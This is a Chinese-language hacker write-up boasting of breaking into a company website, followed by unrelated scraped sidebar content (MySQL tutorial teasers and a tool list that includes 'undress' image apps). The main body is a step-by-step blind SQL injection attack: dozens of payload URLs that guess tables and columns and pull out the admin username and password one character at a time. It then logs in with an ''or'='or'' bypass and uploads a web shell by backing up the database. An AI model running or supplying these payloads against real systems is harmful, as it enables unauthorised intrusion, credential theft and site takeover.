hacked by {R.H.T}12 http://www.xxx.com/NewsInfo.asp?id=95' 返回了错误页面。 http://www.xxx.com/NewsInfo.asp?id=95%20and%201=1 正确页面。 http://www.xxx.com/NewsInfo.asp?id=95%20and%201=2 返回了错误页面。 http://www.xxx.com/NewsInfo.asp?id=
hacked by {R.H.T}12
http://www.xxx.com/NewsInfo.asp?id=95'
返回了错误页面。
http://www.xxx.com/NewsInfo.asp?id=95%20and%201=1
正确页面。
http://www.xxx.com/NewsInfo.asp?id=95%20and%201=2
返回了错误页面。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists(selectcount(*)fromsysobjects)
返回了错误页面。确定ACCESS数据库。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20admin)
出错了。没有admin 的表名
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20vipusers)
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20account)
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20admin_userinfo)
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20admin_user)
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20manage)
都没有。。。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20manage_user)
有了。
猜出表名manage_user
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(password)%20from%20manage_user)>0
一下子就猜出了password的列名。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(user)%20from%20manage_user)>0
错误页面。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(manage_user)%20from%20manage_user)>0
错误页面。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(username)%20from%20manage_user)>0
正确页面。
整理下。
manage_user表。
列名为。
username
password
典型的垃圾站点。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(*)%20from%20manage_user)>5
出错了。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(*)%20from%20manage_user)
正确页面
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(*)%20from%20manage_user)=1
正确页面。只有一条记录数。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20len(username)%20from%20manage_user)>3
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20len(username)%20from%20manage_user)>5
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20len(username)%20from%20manage_user)=5
正确了。
管理员用户名字的数字有5位。
丫肯定用的admin
试下。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,1,1))%20from%20manage_user)=97
转换下。97就是a
我们问问第二位是不是d吧。
这个时候 刚好临近0点。突然掉线了。。。很纠结。。关键时刻阳痿了一样。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,2,1))%20from%20manage_user)=100
返回了正常页面。100就是d
第一位是a第二位是d一共5个字母。一般都是admin
这个时候 群里开始叫了。。大家刚才都掉线了。。有人说台湾黑客攻击。很快。有人说国外刚才也掉线了。。具体原因现在不明。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,3,1))%20from%20manage_user)=109
第三位是m
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,4,1))%20from%20manage_user)=105
第四位是i
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,5,1))%20from%20manage_user)=110
第五位是n
okey`admin
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20len(password)from%20manage_user)=6
直接正确。密码有6位。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)>50
返回正常。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)>70
返回错误
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)>60
错了。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)>65
错了
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)=63
错了
。。。。迷糊了。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)=55
对了。。。。
55转换下。是7
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,2,1))%20from%20manage_user)=55
第二位也是7
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,3,1))%20from%20manage_user)=55
第三位不是了。。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,3,1))%20from%20manage_user)=59
对了。59转换下是;
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,4,1))%20from%20manage_user)=57
第四位。57转换下。是9
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,5,1))%20from%20manage_user)=62
第五位。转换下 62是>
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,6,1))%20from%20manage_user)=62
第六位也是。。
总结下。
账号admin
密码77;9>>
OK 我们找后台。
http://www.xxx.com/manage/Login.asp
直接根据表名猜。猜对了。
用账号密码登陆。。。
提示账号密码不对~!
纠结。
难道不是这个后台。。
用工具扫了一下。。只扫出这么一个后台。
怎么办。
猜账号密码admin admin
不对。。这种傻逼已经很少了。
admin admin888
试了很久。。打算放弃了。
突然想起了万能密码。
'or'='or'
'or'='or'
进去了。。。。。。
我就操 他 女马 了。。。这个漏洞竟然还有。。。这什么垃圾站点。xxxxx邦汽车用品公司。。。
我怒了。提权。
看了下后台。在留言版那里看见有人插了一句话木马。我靠。删掉。
可以备份数据库。直接备份数据库传马。
OK拿下。
http://www.xxx.com/UploadFiles/2010491394386.asp
http://www.xxx.com/1.asp
点评:笔者写的很详细了,其中管理密码这里是典型的雷池加密,77;9>>=658598。
标签分类: 脚本渗透
Adding Users to MySQL: The Complete TutorialMay 12, 2025 am 12:14 AMMastering the method of adding MySQL users is crucial for database administrators and developers because it ensures the security and access control of the database. 1) Create a new user using the CREATEUSER command, 2) Assign permissions through the GRANT command, 3) Use FLUSHPRIVILEGES to ensure permissions take effect, 4) Regularly audit and clean user accounts to maintain performance and security.
Mastering MySQL String Data Types: VARCHAR vs. TEXT vs. CHARMay 12, 2025 am 12:12 AMChooseCHARforfixed-lengthdata,VARCHARforvariable-lengthdata,andTEXTforlargetextfields.1)CHARisefficientforconsistent-lengthdatalikecodes.2)VARCHARsuitsvariable-lengthdatalikenames,balancingflexibilityandperformance.3)TEXTisidealforlargetextslikeartic
MySQL: String Data Types and Indexing: Best PracticesMay 12, 2025 am 12:11 AMBest practices for handling string data types and indexes in MySQL include: 1) Selecting the appropriate string type, such as CHAR for fixed length, VARCHAR for variable length, and TEXT for large text; 2) Be cautious in indexing, avoid over-indexing, and create indexes for common queries; 3) Use prefix indexes and full-text indexes to optimize long string searches; 4) Regularly monitor and optimize indexes to keep indexes small and efficient. Through these methods, we can balance read and write performance and improve database efficiency.
MySQL: How to Add a User RemotelyMay 12, 2025 am 12:10 AMToaddauserremotelytoMySQL,followthesesteps:1)ConnecttoMySQLasroot,2)Createanewuserwithremoteaccess,3)Grantnecessaryprivileges,and4)Flushprivileges.BecautiousofsecurityrisksbylimitingprivilegesandaccesstospecificIPs,ensuringstrongpasswords,andmonitori
The Ultimate Guide to MySQL String Data Types: Efficient Data StorageMay 12, 2025 am 12:05 AMTostorestringsefficientlyinMySQL,choosetherightdatatypebasedonyourneeds:1)UseCHARforfixed-lengthstringslikecountrycodes.2)UseVARCHARforvariable-lengthstringslikenames.3)UseTEXTforlong-formtextcontent.4)UseBLOBforbinarydatalikeimages.Considerstorageov
MySQL BLOB vs. TEXT: Choosing the Right Data Type for Large ObjectsMay 11, 2025 am 12:13 AMWhen selecting MySQL's BLOB and TEXT data types, BLOB is suitable for storing binary data, and TEXT is suitable for storing text data. 1) BLOB is suitable for binary data such as pictures and audio, 2) TEXT is suitable for text data such as articles and comments. When choosing, data properties and performance optimization must be considered.
MySQL: Should I use root user for my product?May 11, 2025 am 12:11 AMNo,youshouldnotusetherootuserinMySQLforyourproduct.Instead,createspecificuserswithlimitedprivilegestoenhancesecurityandperformance:1)Createanewuserwithastrongpassword,2)Grantonlynecessarypermissionstothisuser,3)Regularlyreviewandupdateuserpermissions
MySQL String Data Types Explained: Choosing the Right Type for Your DataMay 11, 2025 am 12:10 AMMySQLstringdatatypesshouldbechosenbasedondatacharacteristicsandusecases:1)UseCHARforfixed-lengthstringslikecountrycodes.2)UseVARCHARforvariable-lengthstringslikenames.3)UseBINARYorVARBINARYforbinarydatalikecryptographickeys.4)UseBLOBorTEXTforlargeuns
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
SublimeText3 Chinese version
Chinese version, very easy to use
mPDF
mPDF is a PHP library that can generate PDF files from UTF-8 encoded HTML. The original author, Ian Back, wrote mPDF to output PDF files "on the fly" from his website and handle different languages. It is slower than original scripts like HTML2FPDF and produces larger files when using Unicode fonts, but supports CSS styles etc. and has a lot of enhancements. Supports almost all languages, including RTL (Arabic and Hebrew) and CJK (Chinese, Japanese and Korean). Supports nested block-level elements (such as P, DIV),
SecLists
SecLists is the ultimate security tester's companion. It is a collection of various types of lists that are frequently used during security assessments, all in one place. SecLists helps make security testing more efficient and productive by conveniently providing all the lists a security tester might need. List types include usernames, passwords, URLs, fuzzing payloads, sensitive data patterns, web shells, and more. The tester can simply pull this repository onto a new test machine and he will have access to every type of list he needs.
MinGW - Minimalist GNU for Windows
This project is in the process of being migrated to osdn.net/projects/mingw, you can continue to follow us there. MinGW: A native Windows port of the GNU Compiler Collection (GCC), freely distributable import libraries and header files for building native Windows applications; includes extensions to the MSVC runtime to support C99 functionality. All MinGW software can run on 64-bit Windows platforms.
SAP NetWeaver Server Adapter for Eclipse
Integrate Eclipse with SAP NetWeaver application server.
